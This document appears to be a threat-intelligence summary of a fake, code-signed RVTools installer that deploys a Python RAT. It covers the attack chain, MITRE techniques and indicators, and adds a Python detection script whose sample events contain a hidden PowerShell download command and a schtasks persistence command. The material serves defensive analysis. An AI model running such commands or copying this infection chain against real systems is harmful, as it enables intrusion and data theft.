RVTools Masquerade: How a Signed Fake Installer Deploys a Modular Python RAT  

A fake RVTools MSI installer was distributed with a valid Sectigo code-signing certificate and used to deploy a modular Python RAT via VBScript, PowerShell, Dropbox, and staged payloads. The campaign targeted VMware administrators and used persistence, reconnaissance, and encrypted C2 traffic to maintain access and steal data. #RVTools #Sectigo #XiamenLunweiHuageNetworkCo #BinaryMyScriptvbs #Pmanagerpy #collectorpy

Keypoints

  • Threat actors distributed a fake RVTools installer as a malicious MSI that closely mimicked the legitimate VMware administration tool.
  • The MSI was signed with a valid Sectigo code-signing certificate tied to Xiamen Lunwei Huage Network Co., Ltd., helping it bypass SmartScreen and security trust checks.
  • The attack used a multi-stage chain: embedded VBScript in the MSI, hidden PowerShell, a Dropbox download, and a WinPython-based payload archive.
  • The payload deployed a modular Python RAT with separate components for reconnaissance, persistence, encryption, and command-and-control.
  • collector.py gathered host, network, privilege, and Active Directory information and stored it in configA.json for later exfiltration.
  • Pmanager.py handled persistence through Registry Run keys and scheduled tasks, while also encrypting data with RC4 and sending it to hardcoded C2 IPs.
  • The campaign was especially dangerous for VMware environments because RVTools is commonly used by administrators with high-level domain access.

MITRE Techniques

  • [T1218.007] System Binary Proxy Execution: Msiexec – The attacker abused MSI custom actions to run embedded script content during installation (‘the attacker abuses this mechanism to trigger the VBScript during the install process’).
  • [T1027] Obfuscated Files or Information – The VBScript and Python components were obfuscated with decimal-to-character encoding and meaningless names to hinder analysis (‘Decimal Obfuscation to hide its true intent’ and ‘core logic buried under meaningless function names’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Hidden PowerShell was used to download and launch the payload (‘spawns a Hidden PowerShell instance’ and ‘calls Invoke-WebRequest’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – A VBScript loader embedded in the MSI executed the first-stage payload (‘malicious script embedded within the installer’s Binary tab’).
  • [T1105] Ingress Tool Transfer – The malware downloaded a malicious archive from Dropbox (‘Invoke-WebRequest to download a malicious archive nearly 30MB from Dropbox’).
  • [T1070.004] File Deletion: File Deletion by Windows Installer – The installer used reboot and artifact-cleaning messaging to conceal ongoing activity (‘appears to be meant for “cleaning installation artifacts” but actually serves the purpose of ensuring that persistence is completed’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence was established through Registry Run entries (‘creating a Registry Run entry’).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – The malware created a scheduled task for persistence (‘schedule task’ and ‘schtasks to create a daily Scheduled Task’).
  • [T1082] System Information Discovery – collector.py gathered host details such as hostname, privileges, services, and network connections (‘collecting sensitive host system data such as hostname, user privileges’).
  • [T1016] System Network Configuration Discovery – The malware fingerprinted the host using MAC address and hostname and collected network context (‘retrieves the machine’s MAC address and hostname’ and ‘active network connections’).
  • [T1069.001] Permission Groups Discovery: Local Groups – It checked whether the user belonged to BUILTIN\Administrators (‘noting if the user belongs to BUILTIN\Administrators’).
  • [T1087.002] Account Discovery: Domain Account – It enumerated computer objects in Active Directory using [adsisearcher] (‘search across the directory for all objects categorized under the “computer” class’).
  • [T1036] Masquerading – The malicious MSI impersonated RVTools and used a believable EULA and admin request to look legitimate (‘fake RVTools installer’ and ‘false sense of security’).
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – RC4 was used to encrypt reconnaissance data and commands (‘uses a hardcoded RC4 key to encrypt the staged configA.json data’).
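A detection sketch for the execution chain summarized in the Keypoints and MITRE entries above (msiexec custom action spawning a script host, hidden PowerShell fetching from Dropbox, schtasks and Run-key persistence). This is an added example, not code from K7 Labs or from the article; the process events, paths, task name and Dropbox URL are constructed placeholders.

```python
import re

# Constructed sample process-creation events (Sysmon event 1 style, simplified);
# not telemetry from the campaign. Tuple: (pid, parent pid, image path, command line).
SAMPLE_EVENTS = [
    (400, 1,   r"C:\Windows\System32\msiexec.exe", "msiexec.exe /i RVTools.msi"),
    (410, 400, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\vm\AppData\Local\Temp\MyScript.vbs"),
    (420, 410, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -c Invoke-WebRequest https://www.dropbox.com/s/PLACEHOLDER/winp.zip -OutFile winp.zip"),
    (430, 420, r"C:\Windows\System32\schtasks.exe", r"schtasks /create /sc daily /tn Updater /tr C:\winp\python.exe"),
    (500, 1,   r"C:\Windows\System32\msiexec.exe", "msiexec.exe /i 7zip.msi"),   # benign install
    (510, 500, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),            # normal child of msiexec
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}

# Command-line markers taken from the chain described above, keyed by the MITRE IDs listed on the page.
CMDLINE_MARKERS = {
    "T1059.001": re.compile(r"powershell.*-w(?:indowstyle)?\s+hidden", re.I),
    "T1105":     re.compile(r"invoke-webrequest|dropbox\.com", re.I),
    "T1053.005": re.compile(r"schtasks(?:\.exe)?\s+/create", re.I),
    "T1547.001": re.compile(r"reg(?:\.exe)?\s+add\s+.*\\currentversion\\run", re.I),
}

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def cmdline_techniques(cmdline):
    """Return the set of technique IDs whose marker appears in a command line."""
    return {tid for tid, rx in CMDLINE_MARKERS.items() if rx.search(cmdline)}

def find_msi_script_chains(events):
    """Flag script hosts (and their descendants) whose ancestry includes msiexec.exe:
    the MSI custom action -> VBScript -> hidden PowerShell pattern (T1218.007)."""
    by_pid = {pid: (ppid, image_name(img), cmd) for pid, ppid, img, cmd in events}
    findings = []
    for pid, (ppid, name, cmd) in by_pid.items():
        chain, cur, seen = [name], ppid, set()
        while cur in by_pid and cur not in seen:  # walk up the tree, guarding against pid reuse cycles
            seen.add(cur)
            chain.append(by_pid[cur][1])
            cur = by_pid[cur][0]
        spawned_by_msi = "msiexec.exe" in chain[1:]
        if spawned_by_msi and any(n in SCRIPT_HOSTS for n in chain):
            techniques = {"T1218.007"} | cmdline_techniques(cmd)
            findings.append({"pid": pid, "chain": " <- ".join(chain), "techniques": sorted(techniques)})
    return findings

if __name__ == "__main__":
    for f in find_msi_script_chains(SAMPLE_EVENTS):
        print(f)
```

A plain msiexec.exe child (pid 510) is not flagged; only processes with a script host somewhere in an msiexec-rooted ancestry are reported, each annotated with the command-line markers seen.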

Indicators of Compromise

  • [File hashes] malicious installer and modules – 0f5e98fb840fb5656d3f50613b6f1ec60e57392643159841bc1fa95396087a4, 64bda120cb447e0c03f451190022a57b and 2 more hashes
  • [File names] dropped or embedded payloads – Binary.MyScript.vbs, Pmanager.py, collector.py
  • [File names] downloaded archive and local staging file – winp.zip, configA.json
  • [Certificate / signer] code-signing identity used to sign the MSI – Xiamen Lunwei Huage Network Co., Ltd. (Sectigo), Sectigo
  • [URLs / service] delivery and reference locations – Dropbox URL used for payload download, VirusTotal file page and Any.run task link
  • [Network indicators] C2 infrastructure – five hardcoded IP addresses used for beaconing and failover, with one primary IP list referenced in the article

Read more: https://labs.k7computing.com/index.php/rvtools-masquerade-how-a-signed-fake-installer-deploys-a-modular-python-rat/